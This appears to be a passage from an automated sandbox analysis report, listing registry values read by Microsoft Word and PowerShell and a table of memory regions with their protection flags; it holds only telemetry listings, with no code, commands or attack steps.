C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cooper Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Corbel
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cordia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CordiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Courier New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Curlz MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DaunPenh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
David
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DilleniaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DokChampa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ebrima
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Edwardian Script ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Elephant
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Engravers MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Bold ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Demi ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Light ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Medium ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Estrangelo Edessa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EucrosiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Euphemia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Felix Titling
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Footlight MT Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Forte
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Book
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Heavy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FrankRuehl
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FreesiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Freestyle Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
French Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gabriola
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Garamond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gautami
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Georgia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gigi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Ext Condensed Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gisha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gloucester MT Extra Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Stout
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Haettenschweiler
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harlow Solid Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harrington
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
High Tower Text
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Impact
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Imprint MT Shadow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Informal Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
IrisUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Iskoola Pota
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
JasmineUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Jokerman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Juice ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kalinga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kartika
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Khmer UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KodchiangUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kokila
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kristen ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kunstler Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lao UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Latha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Leelawadee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Levenim MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LilyUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Bright
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Calligraphy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Console
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Fax
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Handwriting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Typewriter
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Unicode
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Magneto
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Maiandra GD
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mangal
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Marlett
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Matura MT Script Capitals
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Himalaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft New Tai Lue
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft PhagsPa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Tai Le
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Uighur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Yi Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mistral
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Modern No. 20
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mongolian Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Monotype Corsiva
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MoolBoran
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Outlook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Specialty
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MT Extra
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MV Boli
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Narkisim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Engraved
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Solid
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Nyala
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
OCR A Extended
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Old English Text MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Onyx
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palace Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palatino Linotype
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Papyrus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Parchment
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua Titling MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Plantagenet Cherokee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Playbill
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Poor Richard
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Pristina
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Raavi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rage Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ravie
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rod
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sakkal Majalla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Script MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Print
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Semibold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shonar Bangla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Showcard Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shruti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Snap ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Stencil
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sylfaen
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tempus Sans ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Times New Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Traditional Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Trebuchet MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tunga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Utsaah
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vani
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Verdana
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vijaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Viner Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vivaldi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vladimir Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vrinda
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Webdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wide Latin
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 3
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F5013
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LastPurgeTime
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
WORDFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F5013
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Settings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ZoomApp
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTF
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
There are 325 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
3CD8000
|
unkown
|
page read and write
|
||
4DD000
|
heap default
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
3764000
|
unkown
|
page read and write
|
||
35C0000
|
unkown
|
page readonly
|
||
30B9000
|
unkown
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
3728000
|
unkown
|
page read and write
|
||
31E5000
|
unkown
|
page read and write
|
||
3295000
|
unkown
|
page readonly
|
||
28D0000
|
unkown
|
page read and write
|
||
1DC0000
|
heap private
|
page execute and read and write
|
||
3D4E000
|
unkown
|
page read and write
|
||
3CBC000
|
unkown
|
page read and write
|
||
3123000
|
unkown
|
page read and write
|
||
1BA6000
|
unkown
|
page read and write
|
||
1FEB000
|
heap private
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
3379000
|
unkown
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
22E7000
|
unkown
|
page readonly
|
||
7FF00230000
|
unkown
|
page execute and read and write
|
||
CC000
|
unkown
|
page read and write
|
||
2E7E000
|
unkown
|
page read and write
|
||
1D7C000
|
unkown
|
page readonly
|
||
20000
|
heap private
|
page read and write
|
||
7FF001F7000
|
unkown
|
page read and write
|
||
720000
|
unkown
|
page readonly
|
||
307A000
|
unkown
|
page read and write
|
||
32D6000
|
unkown
|
page readonly
|
||
3090000
|
unkown
|
page read and write
|
||
A00000
|
heap private
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
1D70000
|
unkown
|
page readonly
|
||
3212000
|
unkown
|
page readonly
|
||
7FF001F0000
|
unkown
|
page read and write
|
||
31A8000
|
unkown
|
page read and write
|
||
610000
|
unkown
|
page readonly
|
||
7FF00280000
|
unkown
|
page execute and read and write
|
||
3339000
|
unkown
|
page readonly
|
||
376A000
|
unkown
|
page read and write
|
||
C70000
|
heap private
|
page read and write
|
||
3375000
|
unkown
|
page readonly
|
||
37CA000
|
unkown
|
page read and write
|
||
450000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
3174000
|
unkown
|
page read and write
|
||
1FB5000
|
heap private
|
page read and write
|
||
317D000
|
unkown
|
page read and write
|
||
7FF00022000
|
unkown
|
page execute and read and write
|
||
31F5000
|
unkown
|
page read and write
|
||
1D6000
|
unkown
|
page read and write
|
||
3064000
|
unkown
|
page read and write
|
||
10003000
|
unkown image
|
page readonly
|
||
7FF000E0000
|
unkown
|
page read and write
|
||
D6000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page read and write
|
||
7FF000FA000
|
unkown
|
page execute and read and write
|
||
31C9000
|
unkown
|
page read and write
|
||
31A5000
|
unkown
|
page read and write
|
||
520000
|
heap private
|
page read and write
|
||
7FF001B0000
|
unkown
|
page read and write
|
||
10006000
|
unkown image
|
page read and write
|
||
3757000
|
unkown
|
page read and write
|
||
1C93D000
|
unkown
|
page read and write
|
||
7FF000F5000
|
unkown
|
page read and write
|
||
7FF00032000
|
unkown
|
page execute and read and write
|
||
31C3000
|
unkown
|
page read and write
|
||
2C70000
|
heap private
|
page read and write
|
||
3770000
|
unkown
|
page read and write
|
||
2D0000
|
unkown
|
page read and write
|
||
2E21000
|
unkown
|
page read and write
|
||
36F9000
|
unkown
|
page read and write
|
||
2350000
|
unkown
|
page read and write
|
||
1D9B000
|
unkown
|
page readonly
|
||
3542000
|
unkown
|
page readonly
|
||
1CE0000
|
heap private
|
page read and write
|
||
4D7000
|
heap default
|
page read and write
|
||
3336000
|
unkown
|
page readonly
|
||
7FF00290000
|
unkown
|
page execute and read and write
|
||
7FF001A0000
|
unkown
|
page execute and read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
7FF001D0000
|
unkown
|
page read and write
|
||
1E4000
|
heap private
|
page read and write
|
||
7FF002A0000
|
unkown
|
page execute and read and write
|
||
7FF000E2000
|
unkown
|
page execute and read and write
|
||
10001000
|
unkown image
|
page execute read
|
||
7FF00190000
|
unkown
|
page read and write
|
||
1CE4000
|
heap private
|
page read and write
|
||
1C86E000
|
unkown
|
page read and write
|
||
32C5000
|
unkown
|
page readonly
|
||
31F2000
|
unkown
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
23E0000
|
unkown
|
page readonly
|
||
2A9E000
|
unkown
|
page read and write
|
||
3741000
|
unkown
|
page read and write
|
||
1FA000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page read and write
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
4A0000
|
heap default
|
page read and write
|
||
150000
|
unkown
|
page readonly
|
||
310F000
|
unkown
|
page read and write
|
||
B80000
|
heap private
|
page read and write
|
||
AB7000
|
heap private
|
page read and write
|
||
2D10000
|
heap private
|
page read and write
|
||
11D000
|
stack
|
page read and write
|
||
1BAA0000
|
unkown
|
page read and write
|
||
1F40000
|
unkown
|
page readonly
|
||
2335000
|
unkown
|
page read and write
|
||
27F0000
|
unkown
|
page readonly
|
||
5D0000
|
unkown
|
page readonly
|
||
2130000
|
heap private
|
page read and write
|
||
318F000
|
unkown
|
page read and write
|
||
530000
|
unkown
|
page readonly
|
||
2C4A000
|
heap private
|
page execute and read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
30FA000
|
unkown
|
page read and write
|
||
373B000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
1BC40000
|
heap private
|
page read and write
|
||
30F5000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
180000
|
unkown
|
page readonly
|
||
1BA66000
|
unkown
|
page read and write
|
||
3725000
|
unkown
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
3080000
|
unkown
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
214000
|
heap default
|
page read and write
|
||
33B2000
|
unkown
|
page readonly
|
||
27D4000
|
unkown
|
page read and write
|
||
2820000
|
unkown
|
page read and write
|
||
1CA3E000
|
unkown
|
page read and write
|
||
233A000
|
unkown
|
page read and write
|
||
2D7000
|
heap default
|
page read and write
|
||
3633000
|
unkown
|
page read and write
|
||
7FF001C0000
|
unkown
|
page execute and read and write
|
||
3146000
|
unkown
|
page read and write
|
||
3149000
|
unkown
|
page read and write
|
||
1D77000
|
unkown
|
page readonly
|
||
1A0000
|
unkown
|
page read and write
|
||
1CD80000
|
heap private
|
page read and write
|
||
31DF000
|
unkown
|
page read and write
|
||
1C0000
|
unkown
|
page readonly
|
||
7FF00200000
|
unkown
|
page read and write
|
||
32A6000
|
unkown
|
page readonly
|
||
3382000
|
unkown
|
page readonly
|
||
31D3000
|
unkown
|
page read and write
|
||
375A000
|
unkown
|
page read and write
|
||
3170000
|
unkown
|
page read and write
|
||
3214000
|
unkown
|
page readonly
|
||
28D0000
|
unkown
|
page read and write
|
||
3BB5000
|
unkown
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
1D54000
|
heap private
|
page read and write
|
||
319F000
|
unkown
|
page read and write
|
||
7FF00122000
|
unkown
|
page execute and read and write
|
||
33DC000
|
unkown
|
page read and write
|
||
333D000
|
unkown
|
page readonly
|
||
372B000
|
unkown
|
page read and write
|
||
2CD0000
|
unkown
|
page readonly
|
||
4FF000
|
unkown
|
page read and write
|
||
3389000
|
unkown
|
page readonly
|
||
44F000
|
heap private
|
page read and write
|
||
7FF00170000
|
unkown
|
page execute and read and write
|
||
3254000
|
unkown
|
page readonly
|
||
3744000
|
unkown
|
page read and write
|
||
1CBB0000
|
heap private
|
page read and write
|
||
524000
|
heap private
|
page read and write
|
||
4C4000
|
heap default
|
page read and write
|
||
1D97000
|
unkown
|
page readonly
|
||
390000
|
unkown
|
page read and write
|
||
31E2000
|
unkown
|
page read and write
|
||
3232000
|
unkown
|
page readonly
|
||
430000
|
unkown
|
page readonly
|
||
3312000
|
unkown
|
page readonly
|
||
7FF00210000
|
unkown
|
page execute and read and write
|
||
970000
|
heap private
|
page read and write
|
||
3074000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page write copy
|
||
10000000
|
unkown image
|
page readonly
|
